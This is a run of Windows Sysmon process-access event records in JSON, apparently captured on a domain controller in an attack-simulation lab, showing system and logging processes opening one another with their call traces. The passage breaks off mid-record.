{"EventTime":"2020-08-01 06:59:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6873,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:01.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:01.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6874,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:01.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:01.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6875,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:01.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:01.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6876,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:01.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:01.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6877,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:01.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:01.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6878,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:01.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:01.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6879,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:01.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:01.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6880,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:01.912\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010139E0900}\r\nTargetProcessId: 5020\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:01.912","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010139E0900}","TargetProcessId":"5020","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6881,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:02.553\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 